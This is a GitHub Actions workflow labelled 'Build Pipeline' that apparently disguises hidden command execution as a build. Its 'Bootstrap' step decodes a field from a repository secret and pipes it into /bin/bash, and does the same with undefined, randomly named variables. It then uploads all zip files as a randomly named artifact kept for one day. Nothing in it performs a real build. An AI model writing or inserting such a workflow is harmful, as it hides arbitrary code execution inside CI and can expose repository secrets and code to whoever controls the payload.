name: Build Pipeline
on:
  workflow_dispatch:

permissions:
  contents: read
  actions: read
jobs:
  deploy:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Bootstrap
        env:
          kx33: ${{ secrets.kx33 }}
        run: |
          printf '%s' "$kx33" | jq -r .b8 | /bin/bash
          printf '%s' "$fuy0" | jq -r .zig9357 | /bin/bash
          printf '%s' "$chhy87510" | jq -r .fx2167 | /bin/bash
          echo $rjaj39 | jq -r .pl2494 | /bin/bash

      - name: Archive artifact
        uses: actions/upload-artifact@v4
        with:
          name: a8WLcfwx
          path: "*.zip"
          retention-days: 1
